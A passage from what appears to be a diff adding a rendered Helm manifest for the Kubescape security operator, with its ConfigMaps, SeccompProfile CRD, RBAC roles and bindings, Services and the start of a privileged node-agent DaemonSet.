\"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: registry-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: storage + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"cleanupInterval\": \"6h\",\n \"disableVirtualCRDs\": false,\n\ + \ 
\"disableSeccompProfileEndpoint\": true,\n \"excludeJsonPaths\": null,\n \ + \ \"defaultQueueLength\": 100,\n \"defaultWorkerCount\": 2,\n \"defaultMaxObjectSize\"\ + : 400000,\n \"queueManagerEnabled\": true,\n \"kindQueues\": {\"applicationprofiles\"\ + :{\"maxObjectSize\":20000000,\"queueLength\":50,\"workerCount\":2},\"containerprofiles\"\ + :{\"maxObjectSize\":2500000,\"queueLength\":50,\"workerCount\":2},\"networkneighborhoods\"\ + :{\"maxObjectSize\":10000000,\"queueLength\":50,\"workerCount\":2},\"openvulnerabilityexchangecontainers\"\ + :{\"maxObjectSize\":500000,\"queueLength\":50,\"workerCount\":1},\"sbomsyftfiltereds\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1},\"sbomsyfts\"\ + :{\"maxObjectSize\":100000000,\"queueLength\":50,\"workerCount\":1},\"vulnerabilitymanifests\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1}},\n \"tlsClientCaFile\"\ + : \"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\",\n \"tlsServerCertFile\"\ + : \"/etc/storage-ca-certificates/tls.crt\",\n \"tlsServerKeyFile\": \"/etc/storage-ca-certificates/tls.key\"\ + ,\n \"serverBindPort\": \"8443\"\n}\n" +--- +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: kubescape-storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 5Gi +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: seccompprofiles.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: seccompprofile + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: seccompprofile + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: kubescape.io + names: + plural: seccompprofiles + singular: seccompprofile + kind: SeccompProfile + listKind: SeccompProfileList + shortNames: + - scp + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + containers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + 
type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + initContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the init container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + ephemeralContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the ephemeral container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + 
type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + status: + type: object + properties: + containers: + type: object + additionalProperties: + type: object + properties: + conditions: + type: array + items: + type: object + properties: + type: + type: string + description: Type of this condition + status: + type: string + description: Status of this condition (True, False, Unknown) + lastTransitionTime: + type: string + format: date-time + description: Last time this condition transitioned + reason: + type: string + description: Reason for this condition's last transition + message: + type: string + description: Message about this condition's last transition + status: + type: string + description: Profile state + path: + type: string + description: Path to the seccomp profile + activeWorkloads: + type: array + items: + type: string + description: Active workloads using this profile + localhostProfile: + type: string + description: Path for securityContext.seccompProfile.localhostProfile + subresources: + status: {} + additionalPrinterColumns: + - name: Age + type: date + jsonPath: .metadata.creationTimestamp +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - pods/proxy + - namespaces + - nodes + - configmaps + - services + - serviceaccounts + - endpoints + - persistentvolumeclaims + - persistentvolumes + - limitranges + - replicationcontrollers + - podtemplates + - resourcequotas + - events + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apiregistration.k8s.io + resources: + - apiservices + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - statefulsets + - daemonsets + - replicasets + - controllerrevisions + verbs: + - get + - watch + - list +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - watch + - list +- apiGroups: + - discovery.k8s.io + resources: + - endpointslices + verbs: + - get + - watch + - list +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - hostdata.kubescape.cloud + resources: + - APIServerInfo + - ControlPlaneInfo + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io 
+ resources: + - networkpolicies + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - cilium.io + resources: + - ciliumnetworkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - projectcalico.org + resources: + - networkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - networking.istio.io + resources: + - gateways + - virtualservices + verbs: + - get + - list + - watch +- apiGroups: + - security.istio.io + resources: + - authorizationpolicies + verbs: + - get + - list + - watch +- apiGroups: + - policy + resources: + - poddisruptionbudgets + - podsecuritypolicies + - PodSecurityPolicy + verbs: + - get + - watch + - list +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + - clusterrolebindings + - roles + - rolebindings + verbs: + - get + - watch + - list +- apiGroups: + - storage.k8s.io + resources: + - csistoragecapacities + - storageclasses + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - extensions + resources: + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - gateway.networking.k8s.io + resources: + - httproutes + - gateways + - gatewayclasses + - tcproutes + - tlsroutes + - udproutes + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - namespaces + verbs: + - update +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - workloadconfigurationscans + - workloadconfigurationscansummaries + verbs: + - create + - get + - update + - patch +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - openvulnerabilityexchangecontainers + - sbomsyfts + - sbomsyftfiltereds + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - nodes + - nodes/proxy + - services + - endpoints + - namespaces + - configmaps + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - pods + verbs: + - get + - watch + - list + - delete +- apiGroups: + - '' + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - 
statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - applicationprofiles + - networkneighborhoods + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - seccompprofiles + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + - sbomsyfts + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - create + - patch + - get +- apiGroups: + - kubescape.io + resources: + - rules + verbs: + - list + - watch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - nodes + - namespaces + - configmaps + - services + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - events + verbs: + - create + - patch +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - workloadconfigurationscans + - workloadconfigurationscansummaries + - openvulnerabilityexchangecontainers + - containerprofiles + - sbomsyfts + verbs: + - get + - watch + - list + - delete +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch + - get +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list + - create + - update + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - configurationscansummaries + - vulnerabilitysummaries + verbs: + - get + - watch + - list +--- 
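+# Hedged RBAC spot-check for the node-agent ClusterRole above (names taken
+# from this render: the node-agent ServiceAccount lives in the `honey`
+# namespace, and its ClusterRoleBinding appears further down). After apply:
+#   kubectl auth can-i watch rules.kubescape.io \
+#     --as=system:serviceaccount:honey:node-agent
+# should print "yes"; "no" usually means the binding was renamed or pruned.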
+kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - namespaces + - pods + - services + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - daemonsets + - deployments + - replicasets + - statefulsets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - cronjobs + - jobs + verbs: + - get + - watch + - list +- apiGroups: + - flowcontrol.apiserver.k8s.io + resources: + - prioritylevelconfigurations + - flowschemas + verbs: + - get + - watch + - list +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubevuln +subjects: +- kind: ServiceAccount + name: kubevuln + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: node-agent + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: node-agent +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: 
ServiceAccount + name: operator + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: operator +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: prometheus-exporter + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: prometheus-exporter +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage:system:auth-delegator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: system:auth-delegator +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: storage +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - configmaps + - secrets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +- apiGroups: + - batch + resources: + - cronjobs + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: RoleBinding +apiVersion: 
rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: operator +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - name: http + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape +--- +apiVersion: v1 +kind: Service +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln +--- +apiVersion: v1 +kind: Service +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - name: prometheus + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape-admission-webhook + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator 
+ app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + targetPort: 8443 + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + type: ClusterIP +--- +apiVersion: v1 +kind: Service +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 4002 + targetPort: 4002 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator +--- +apiVersion: v1 +kind: Service +metadata: + name: prometheus-exporter + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: null + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter +--- +apiVersion: v1 +kind: Service +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + protocol: TCP + targetPort: 8443 + name: https + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + template: + metadata: + annotations: + checksum/node-agent-config: ec2818edfe76e3a71137b1e9c55bd598a3f49c75af64d9f74061e320150c439b + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + 
container.apparmor.security.beta.kubernetes.io/node-agent: unconfined + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: null + priorityClassName: kubescape-critical + serviceAccountName: node-agent + automountServiceAccountToken: true + hostPID: true + volumes: + - hostPath: + path: / + name: host + - hostPath: + path: /var/lib/kubelet + name: kubeletdir + - hostPath: + path: /run + name: run + - hostPath: + path: /var + name: var + - hostPath: + path: /sys/fs/cgroup + name: cgroup + - hostPath: + path: /lib/modules + name: modules + - hostPath: + path: /sys/fs/bpf + name: bpffs + - hostPath: + path: /sys/kernel/debug + name: debugfs + - hostPath: + path: /boot + name: boot + - emptyDir: {} + name: data + - emptyDir: {} + name: profiles + - emptyDir: {} + name: clamdb + - 